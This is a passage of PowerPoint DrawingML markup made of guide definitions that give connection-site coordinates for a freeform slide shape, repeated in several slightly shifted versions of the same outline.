              <a:gd name="connsiteX79" fmla="*/ 543343 w 1401087"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 545014 w 1401087"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 562577 w 1401087"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 563002 w 1401087"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 564825 w 1401087"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 551660 w 1401087"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 552161 w 1401087"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 539761 w 1401087"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 524946 w 1401087"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 525611 w 1401087"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 516479 w 1401087"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 503088 w 1401087"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 475818 w 1401087"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 418432 w 1401087"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 367350 w 1401087"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 347444 w 1401087"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 338167 w 1401087"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 325128 w 1401087"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 331127 w 1401087"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 333739 w 1401087"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 310068 w 1401087"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 299955 w 1401087"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 284172 w 1401087"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 281630 w 1401087"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 282623 w 1401087"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 274429 w 1401087"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 255607 w 1401087"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 232164 w 1401087"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 185963 w 1401087"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 158274 w 1401087"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 157400 w 1401087"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 138195 w 1401087"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 151275 w 1401087"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 144017 w 1401087"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 130102 w 1401087"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 138409 w 1401087"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 139597 w 1401087"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 144282 w 1401087"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 136564 w 1401087"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 125870 w 1401087"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 114606 w 1401087"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 116062 w 1401087"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 118298 w 1401087"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 110927 w 1401087"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 80335 w 1401087"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 59285 w 1401087"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 58843 w 1401087"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 44514 w 1401087"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 29933 w 1401087"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 34944 w 1401087"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 20886 w 1401087"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 20567 w 1401087"/>
              <a:gd name="connsiteY130" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 193 w 1401087"/>
              <a:gd name="connsiteY131" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 88207 w 1401087"/>
              <a:gd name="connsiteY132" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 88037 w 1401087"/>
              <a:gd name="connsiteY133" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 109547 w 1401087"/>
              <a:gd name="connsiteY134" fmla="*/ 309501 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 93730 w 1401087"/>
              <a:gd name="connsiteY135" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 110757 w 1401087"/>
              <a:gd name="connsiteY136" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 102467 w 1401087"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 114751 w 1401087"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 74305 w 1401087"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 53738 w 1380520"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1380520 w 1380520"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1380520 w 1380520"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 117214 w 1380520"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 153807 w 1380520"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 165307 w 1380520"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 190046 w 1380520"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 167603 w 1380520"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 182694 w 1380520"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 200138 w 1380520"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 214178 w 1380520"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 267135 w 1380520"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 282822 w 1380520"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 326527 w 1380520"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 309750 w 1380520"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 287165 w 1380520"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 294329 w 1380520"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 277074 w 1380520"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 304102 w 1380520"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 282094 w 1380520"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 280892 w 1380520"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 296307 w 1380520"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 283694 w 1380520"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 268923 w 1380520"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 318435 w 1380520"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 297510 w 1380520"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 337102 w 1380520"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 384232 w 1380520"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 397800 w 1380520"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 413781 w 1380520"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 447274 w 1380520"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 456873 w 1380520"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 468099 w 1380520"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 469119 w 1380520"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 476460 w 1380520"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 479763 w 1380520"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 480747 w 1380520"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 476381 w 1380520"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 483058 w 1380520"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 479991 w 1380520"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 486821 w 1380520"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 493857 w 1380520"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 496588 w 1380520"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 493292 w 1380520"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 494846 w 1380520"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 501755 w 1380520"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 497611 w 1380520"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 513014 w 1380520"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 518917 w 1380520"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 523650 w 1380520"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 524943 w 1380520"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 522750 w 1380520"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 518230 w 1380520"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 513313 w 1380520"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 509878 w 1380520"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 490531 w 1380520"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 494604 w 1380520"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 479860 w 1380520"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 481009 w 1380520"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 479585 w 1380520"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 465880 w 1380520"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 467478 w 1380520"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 460900 w 1380520"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 462231 w 1380520"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 466585 w 1380520"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 471663 w 1380520"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 494257 w 1380520"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 493682 w 1380520"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 493989 w 1380520"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 494016 w 1380520"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 492631 w 1380520"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 491515 w 1380520"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 493248 w 1380520"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 496991 w 1380520"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 496457 w 1380520"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 505153 w 1380520"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 512499 w 1380520"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 511795 w 1380520"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 515238 w 1380520"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 522776 w 1380520"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 524447 w 1380520"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 542010 w 1380520"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 542435 w 1380520"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 544258 w 1380520"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 531093 w 1380520"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 531594 w 1380520"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 519194 w 1380520"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 504379 w 1380520"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 505044 w 1380520"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 495912 w 1380520"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 482521 w 1380520"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 455251 w 1380520"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 397865 w 1380520"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 346783 w 1380520"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 326877 w 1380520"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 317600 w 1380520"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 304561 w 1380520"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 310560 w 1380520"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 313172 w 1380520"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 289501 w 1380520"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 279388 w 1380520"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 263605 w 1380520"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 261063 w 1380520"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 262056 w 1380520"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 253862 w 1380520"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 235040 w 1380520"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 211597 w 1380520"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 165396 w 1380520"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 137707 w 1380520"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 136833 w 1380520"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 117628 w 1380520"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 130708 w 1380520"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 123450 w 1380520"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 109535 w 1380520"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 117842 w 1380520"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 119030 w 1380520"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 123715 w 1380520"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 115997 w 1380520"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 105303 w 1380520"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 94039 w 1380520"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 95495 w 1380520"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 97731 w 1380520"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 90360 w 1380520"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 59768 w 1380520"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 38718 w 1380520"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 38276 w 1380520"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 23947 w 1380520"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 9366 w 1380520"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 14377 w 1380520"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 319 w 1380520"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 0 w 1380520"/>
              <a:gd name="connsiteY130" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 68392 w 1380520"/>
              <a:gd name="connsiteY131" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 67640 w 1380520"/>
              <a:gd name="connsiteY132" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 67470 w 1380520"/>
              <a:gd name="connsiteY133" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 88980 w 1380520"/>
              <a:gd name="connsiteY134" fmla="*/ 309501 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 73163 w 1380520"/>
              <a:gd name="connsiteY135" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 90190 w 1380520"/>
              <a:gd name="connsiteY136" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 81900 w 1380520"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 94184 w 1380520"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 53738 w 1380520"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 53420 w 1380202"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1380202 w 1380202"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1380202 w 1380202"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 116896 w 1380202"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 153489 w 1380202"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 164989 w 1380202"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 189728 w 1380202"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 167285 w 1380202"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 182376 w 1380202"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 199820 w 1380202"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 213860 w 1380202"/>
